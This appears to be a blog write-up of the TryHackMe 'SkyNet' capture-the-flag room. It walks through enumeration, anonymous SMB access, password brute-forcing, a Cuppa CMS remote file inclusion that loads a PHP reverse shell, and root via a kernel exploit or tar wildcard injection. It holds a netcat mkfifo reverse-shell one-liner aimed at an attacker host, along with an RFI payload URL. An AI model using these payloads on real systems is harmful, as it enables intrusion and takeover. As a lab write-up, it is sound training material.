Xuptox

SkyNet

A vulnerable Terminator themed Linux machine. Are you able to compromise this Terminator themed machine?

Linux CVE RFI linPEAS

Room Description

A vulnerable Terminator themed Linux machine. Are you able to compromise this Terminator themed machine? Find THM room here

Used Commands 

nmap -sV -sC -oN nmap.out -vv <target ip>
gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt
/usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt
smbclient //<target ip>/anonymous -U
python -m http.server <webserver port>
wget http://<webserver ip>:<webserver port>/<file name>
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh

Enumeration

The task description does not give too much information. Using Nmap and gobuster is a good way to start with. The next two steps show how the way I enumerated the target with Nmap and gobuster. The third step will be a summary of what information was found.

Nmap

Run: nmap -sV -sC -oN nmap.out -vv <target ip>

Starting Nmap 7.80 ( https://nmap.org ) at 2021-04-24 20:54 UTC
NSE: Loaded 151 scripts for scanning.
...
PORT    STATE SERVICE     REASON         VERSION
22/tcp  open  ssh         syn-ack ttl 64 OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKeTyrvAfbRB4onlz23fmgH5DPnSz07voOYaVMKPx5bT62zn7eZzecIVvfp5LBCetcOyiw2Yhocs0oO1/RZSqXlwTVzRNKzznG4WTPtkvD7ws/4tv2cAGy1lzRy9b+361HHIXT8GNteq2mU+boz3kdZiiZHIml4oSGhI+/+IuSMl5clB5/FzKJ+mfmu4MRS8iahHlTciFlCpmQvoQFTA5s2PyzDHM6XjDYH1N3Euhk4xz44Xpo1hUZnu+P975/GadIkhr/Y0N5Sev+Kgso241/v0GQ2lKrYz3RPgmNv93AIQ4t3i3P6qDnta/06bfYDSEEJXaON+A9SCpk2YSrj4A7
|   256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBI0UWS0x1ZsOGo510tgfVbNVhdE5LkzA4SWDW/5UjDumVQ7zIyWdstNAm+lkpZ23Iz3t8joaLcfs8nYCpMGa/xk=
|   256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICHVctcvlD2YZ4mLdmUlSwY8Ro0hCDMKGqZ2+DuI0KFQ
80/tcp  open  http        syn-ack ttl 64 Apache httpd 2.4.18 ((Ubuntu))
| http-methods:
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open  pop3        syn-ack ttl 64 Dovecot pop3d
|_pop3-capabilities: UIDL AUTH-RESP-CODE RESP-CODES SASL PIPELINING TOP CAPA
139/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open  imap        syn-ack ttl 64 Dovecot imapd
|_imap-capabilities: Pre-login more LITERAL+ have LOGINDISABLEDA0001 ID IDLE post-login SASL-IR listed ENABLE OK IMAP4rev1 LOGIN-REFERRALS capabilities
445/tcp open  netbios-ssn syn-ack ttl 64 Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
MAC Address: 02:9D:B2:03:AA:DD (Unknown)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel

Continue with the next step in another shell.

Gobuster

Start gobuster and let it work in parallel. I expected a different result when running the following command without a specified port, but this was not the case.

Run gobuster dir -u http://<target ip>:<target port> -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt | tee gobuster.txt

===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.61.56:80
[+] Threads:        10
[+] Wordlist:       /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/04/24 21:08:15 Starting gobuster
===============================================================
/admin (Status: 301)
/css (Status: 301)
/js (Status: 301)
/config (Status: 301)
/ai (Status: 301)
/squirrelmail (Status: 301)
/server-status (Status: 403)
===============================================================
2021/04/24 21:08:32 Finished
===============================================================

What’s in the reports?

Nmap and Gobuster show a couple of open ports and available directories. Read the reports carefully. You should be able to extract similar information as follow. I’ve listed them below:

Service Port
Apache 2.4.18 Webserver 80
SMB 139/445
SSH 22
Dovecot Mailserver 110/143
Directories Result
/admin Forbidden
/config Forbidden
/squirrelmail Login
/ai Forbidden

Further, have a look at the source code of the website. Sometimes you can spot some useful information.

Website

Open your browser and navigate to http://<target ip>

Screenshot of the website behind the webserver

I played around a little but there seems not much to be. Then I used searchsploit in the hope to find some vulnerabilities for Apache 2.4.18 but couldn’t find something that helps to get a foot in the door. At this point, I thought about going for that login screen /squirrelmail but the information is rare so I decided to go for SMB. Let’s go!

SMB

Use enum4linux to collect info about shares. Use the path to your enum4linx.pl script run it.

For me it’s /usr/share/enum4linux/enum4linux.pl -a <target ip> | tee enum4linux.txt

 ==========================
|    Target Information    |
 ==========================
Target ........... 10.10.61.56
RID Range ........ 500-550,1000-1050
Username ......... ''
Password ......... ''
Known Usernames .. administrator, guest, krbtgt, domain admins, root, bin, none
...
 ====================================
|    Session Check on 10.10.61.56    |
 ====================================
[+] Server 10.10.61.56 allows sessions using username '', password ''
...
 ============================
|    Users on 10.10.61.56    |
 ============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson       Name:   Desc:

user:[milesdyson] rid:[0x3e8]
...
 ========================================
|    Share Enumeration on 10.10.61.56    |
 ========================================

        Sharename       Type      Comment
        ---------       ----      -------
        print$          Disk      Printer Drivers
        anonymous       Disk      Skynet Anonymous Share
        milesdyson      Disk      Miles Dyson Personal Share
        IPC$            IPC       IPC Service (skynet server (Samba, Ubuntu))
SMB1 disabled -- no workgroup available

[+] Attempting to map shares on 10.10.61.56
//10.10.61.56/print$    Mapping: DENIED, Listing: N/A
//10.10.61.56/anonymous Mapping: OK, Listing: OK
//10.10.61.56/milesdyson        Mapping: DENIED, Listing: N/A
//10.10.61.56/IPC$      [E] Cant understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing
 ======================================================================
|    Users on 10.10.61.56 via RID cycling (RIDS: 500-550,1000-1050)    |
 ======================================================================
[I] Found new SID: S-1-22-1
[I] Found new SID: S-1-5-21-2393614426-3774336851-1116533619
[I] Found new SID: S-1-5-32
[+] Enumerating users using SID S-1-5-21-2393614426-3774336851-1116533619 and logon username '', password ''
S-1-5-21-2393614426-3774336851-1116533619-500 *unknown*\*unknown* (8)
S-1-5-21-2393614426-3774336851-1116533619-501 SKYNET\nobody (Local User)
S-1-5-21-2393614426-3774336851-1116533619-1000 SKYNET\milesdyson (Local User)
...

Check the log and find some useful info for us.

Fact Description
Anonymous Login Yes
Users SKYNET\milesdyson (Local User)
Shares anonymous, milesdyson

Let’s try to connect and see what we get!

Share of interest is anonymous user is '' and password is ''

Run smbclient //<target ip>/anonymous -U and confirm two times.

root@kali:~/Desktop# smbclient //10.10.61.56/anonymous -U
Enter WORKGROUP\root's password:
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Thu Nov 26 16:04:00 2020
  ..                                  D        0  Tue Sep 17 07:20:17 2019
  attention.txt                       N      163  Wed Sep 18 03:04:59 2019
  logs                                D        0  Wed Sep 18 04:42:16 2019
                9204224 blocks of size 1024. 5788828 blocks available

Get both attention.txt and the log files in logs.

A recent system malfunction has caused various passwords to be changed.
All skynet employees are required to change their password after seeing this.
-Miles Dyson

log1.txt seems to contain some passwords.

User is milesdyson password is taken from the list. First I used Hydra and tried to brute-force SMB without success. So I choose to switch over to /squirrelmail.

SquirrelMail

Login screen showing SquirrelMail

I used BurpSuite for brute-forcing the password. If you are not familiar with Burp Suite check out this introductory room on THM BurpSuite created by DarkStar7471.

Load the password list and start the attack. You will receive a list of responses where you need to pick the outstanding one (look at the response code). Use the credentials and try to log in.

That’s also the password the current task is asking for.

Read through the mails and find the following info:

Email Information
1 Password for SMB
2 Binary string
3 some strange text

Screenshot of mail 1 The first mail shows a new password that we will give a try!

Screenshot of mail 2 The second mail contains some binary code.

Screenshot of mail 3 The third mail contains some more crazy text.

Use the password in the first mail to log in using smbclient like above.

Run smbclient //<target ip>/milesdyson -U milesdyson

Enter WORKGROUP\milesdysons password: <password from email>
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Tue Sep 17 05:05:47 2019
  ..                                  D        0  Tue Sep 17 23:51:03 2019
  Improving Deep Neural Networks.pdf      N  5743095  Tue Sep 17 05:05:14 2019
  Natural Language Processing-Building Sequence Models.pdf      N 12927230  Tue Sep 17 05:05:14 2019
  Convolutional Neural Networks-CNN.pdf      N 19655446  Tue Sep 17 05:05:14 2019
  notes                               D        0  Tue Sep 17 05:18:40 2019
  Neural Networks and Deep Learning.pdf      N  4304586  Tue Sep 17 05:05:14 2019
  Structuring your Machine Learning Project.pdf      N  3531427  Tue Sep 17 05:05:14 2019

    9204224 blocks of size 1024. 5831472 blocks available
smb: \>

What’s the hidden directory?

Check out the notes directory and find important.txt. This file contains a hidden folder.

1. Add features to beta CMS /****************
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife

There is nothing really useful on this site. Seems to be a dead end. Let’s go through what we have found so far.

Quick Summary

There is SSH, SMB, an Apache Webserver, and a Dovecot MailServer. We successfully logged into SMB share anonymous and found a text file that told us that there was a malfunction causing passwords to be changed. One of the log files contained a list of passwords that we used to brute-force into SquirrelMail. We again found a password in one of the mails and successfully logged into SMB share of milesdyson. From there we found another hidden directory.

Let’s move on and enumerate the hidden directory.

For me, that part was a bit tricky because digging deeper was not my first thought about how to continue. Instead, I was lurking for any options regarding SSH but then found out there wasn’t enough information to do so. Finally, I stuck at this point and had to read another write-up to get my feet on the ground. The solution is quite simple: Start over and collect more info from a different base.

Digging deeper

Navigate to that directory using your browser. There is an image of milesdyson some text about him. The source code does not give any more information. The only option seems to be to dig deeper.

Run gobuster dir -u http://<target ip>/45kra24zxs28v3yd/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 250

There is another directory /administrator. Navigate there and find a CMS (something we already read about in the notes).

Great! We don’t have credentials to log in but what about using searchsploit?. Maybe there are some known exploits on this CMS.

searchsploit cuppa

You can also checkout corresponding CVE on exploit-db and read the description there.

That’s another question that you can answer now. What's the vulnerability called when you can include a remote file for malicious purposes? 2/3 of the answer is in the title of the exploit you downloaded. Use google and search for the first word. You’ll quickly find it on your own.

Gain initial Reverse Shell

It’s recommended to read the exploit description in every detail to understand the following.

Download php-reverse-shell.php from github and change the IP and port.

  • Setup a webserver python3 -m http.server 8888.
  • Set up a Netcat listener nc -lvnp 4444.
    Use the same port that you included in php-reverse-shell.php.
  • Append alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php on the URL of the login page http://<target ip>/45kra24zxs28v3yd/administrator/.

The URL should look like this:
http://<target ip>/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://<webserver ip>:8888/shell.php

Copy that URL to your browser and hit enter.

Extend Shell to root

Read different write-ups and you will see different approaches. A good way to start with is e.g. sudo -l or crontabs. Try both ways on your own.

Solution 1: Linux Kernel

On the attack machine:

  • Check Linux version: 4.8
  • Use searchsploit Linux 4.8 to search for any vulnerabilities
  • There is one record with a version matching the OS version above
  • Copy this exploit using searchsploit -m 43418.c to your local folder
  • Start a webserver python -m http.server 8888 (where you copied the exploit to)

On the target machine:

  • Change directory cd /var/www/html as user www-data can write there.
  • Download the file to the target via http.server wget http://<webserver ip>:8888/43418.c
$ wget http://10.10.48.92:8000/43418.c
--2021-04-29 11:42:36--  http://10.10.48.92:8000/43418.c
Connecting to 10.10.48.92:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 24033 (23K) [text/plain]
Saving to: '43418.c'

     0K .......... .......... ...                             100% 65.5M=0s

2021-04-29 11:42:36 (65.5 MB/s) - '43418.c' saved [24033/24033]
  • Compile that file: gcc 43418.c -o privesc
  • and run ./privesc
$ gcc 43418.c -o privesc
$ ./privesc
^[[3~bash: cannot set terminal process group (1290): Inappropriate ioctl for device
bash: no job control in this shell
root@skynet:/var/www/html# whoami
whoami
root
root@skynet:/var/www/html# id
id
uid=0(root) gid=0(root) groups=0(root)

Solution 2: Wildcards

This way is quite interesting! For further reading search for exploit tar wildcard for privilege escalation on google.

The principle behind this approach is to trick tar to execute files as different users (e.g. as root).
In the following case multiple files are created:

  • a file that tells tar to stop at a specific checkpoint
  • another file that tells tar what to do at this specific checkpoint
  • and finally the file that should be executed shell.sh
cd /var/www/html
touch "/var/www/html/--checkpoint=1"
touch "/var/www/html/--checkpoint-action=exec=sh shell.sh"
echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc <atk ip> <atkport> >/tmp/f" > shell.sh

Start a Netcat listener on the attacker machine with nc -lvnp <port> and wait until the next cronjob is finished.

Congrats! You are root! Now locate the root flag and finish that room.

← Create Repo For Hugo On GitHub
GameZone →